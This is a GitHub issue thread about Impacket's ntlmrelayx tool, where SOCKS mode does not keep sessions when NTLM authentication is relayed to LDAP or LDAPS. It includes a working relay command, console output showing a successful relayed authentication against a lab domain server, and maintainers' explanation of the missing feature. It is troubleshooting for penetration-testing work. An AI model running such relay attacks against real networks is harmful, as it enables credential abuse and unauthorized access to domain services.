Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

LDAP relay in ntlmrelayx does not create active sessions #514

Open
imaibou opened this issue Nov 10, 2018 · 6 comments · May be fixed by #1825
Open

LDAP relay in ntlmrelayx does not create active sessions #514

imaibou opened this issue Nov 10, 2018 · 6 comments · May be fixed by #1825
Labels
enhancement Implemented features can be improved or revised

Comments

@imaibou
Copy link
Contributor

imaibou commented Nov 10, 2018
edited
Loading

When targeting the LDAP service of a server and then receiving a connexion in NTLMRelay, there is no LDAP session created:

sudo ntlmrelayx.py -t ldap://192.168.56.254 -socks --no-da --no-acl --no-dump -l /tmp/loot1
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Running in relay mode to single host
[*] SOCKS proxy started. Listening at port 1080
[*] IMAP Socks Plugin loaded..
[*] HTTP Socks Plugin loaded..
[*] MSSQL Socks Plugin loaded..
[*] SMB Socks Plugin loaded..
[*] HTTPS Socks Plugin loaded..
[*] SMTP Socks Plugin loaded..
[*] IMAPS Socks Plugin loaded..
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
Type help for list of commands
ntlmrelayx>  * Serving Flask app "impacket.examples.ntlmrelayx.servers.socksserver" (lazy loading)
 * Environment: production
   WARNING: Do not use the development server in a production environment.
   Use a production WSGI server instead.
 * Debug mode: off

ntlmrelayx> [*] SMBD: Received connection from 192.168.56.1, attacking target ldap://192.168.56.254
[*] Authenticating against ldap://192.168.56.254 as <redacted>\<redacted> SUCCEED

ntlmrelayx> socks
[*] No Relays Available!
ntlmrelayx>

Is there something I am missing? I am using impacket on an ubuntu machine against a Windows server 2012 R2 Virtualbox machine with LDAP signing disabled.

Thanks.
@imaibou imaibou changed the title LDAP relyy LDAP relay in ntlmrelayx does not create active sessions Nov 10, 2018
@imaibou
Copy link
Contributor Author

imaibou commented Nov 10, 2018

Also maybe related, when targeting the LDAPS service, I get the following error:

ntlmrelayx> [*] SMBD: Received connection from 192.168.56.1, attacking target ldaps://192.168.56.254
[-] Connection against target ldaps://192.168.56.254 FAILED: ('unable to open socket', [(LDAPSocketOpenError('socket ssl wrapping error: [Errno 104] Connection reset by peer',), ('192.168.56.254', 636))])

@asolino
Copy link
Collaborator

asolino commented Nov 11, 2018

Can you run the script with -debug to check if there's anything else useful? (CCing @dirkjanm )

@dirkjanm
Copy link
Contributor

The SOCKS server does not yet support LDAP(s), so only the default attacks will work here. As you disabled them all on the command line it won't do anything except relaying the connection.
As for the LDAPS not working, I have seen this a few times myself and think it has something to do with whether the SSL certificates are set correctly on the server. Usually targeting another DC worked for me with this.

@asolino
Copy link
Collaborator

asolino commented Nov 15, 2018

Thanks for the info @dirkjanm. Leaving this open until we support SOCKS LDAP.

@asolino asolino added the enhancement Implemented features can be improved or revised label Nov 15, 2018
@ad0nis
Copy link

ad0nis commented Mar 6, 2019

Hitting the "Connection reset by peer" on LDAPS for every DC in my target organization. Assuming that's related to the certificate not validating, I'd love to be able to disable certificate validation, as most organizations are going to have a self-signed root cert instead of a valid SSL cert for their domain anyway...

(Sorry for tacking this onto the existing bug if this should be a separate issue.)

@dtrizna dtrizna mentioned this issue Mar 7, 2019
Closed
@EAGAIIN
Copy link

EAGAIIN commented Jul 30, 2023

The SOCKS server does not yet support LDAP(s), so only the default attacks will work here. As you disabled them all on the command line it won't do anything except relaying the connection. As for the LDAPS not working, I have seen this a few times myself and think it has something to do with whether the SSL certificates are set correctly on the server. Usually targeting another DC worked for me with this.

Is this something that one day might be available?

b1two added a commit to b1two/impacket that referenced this issue Oct 6, 2024
@b1two
Add support for LDAP and LDAPS in ntlmrelayx SOCKS
6b688a8 
Should fix fortra#514
@b1two b1two linked a pull request Oct 6, 2024 that will close this issue
Open
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
enhancement Implemented features can be improved or revised
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Add support for LDAP and LDAPS protocols in ntlmrelayx SOCKS b1two/impacket
5 participants
@dirkjanm @imaibou @ad0nis @asolino @EAGAIIN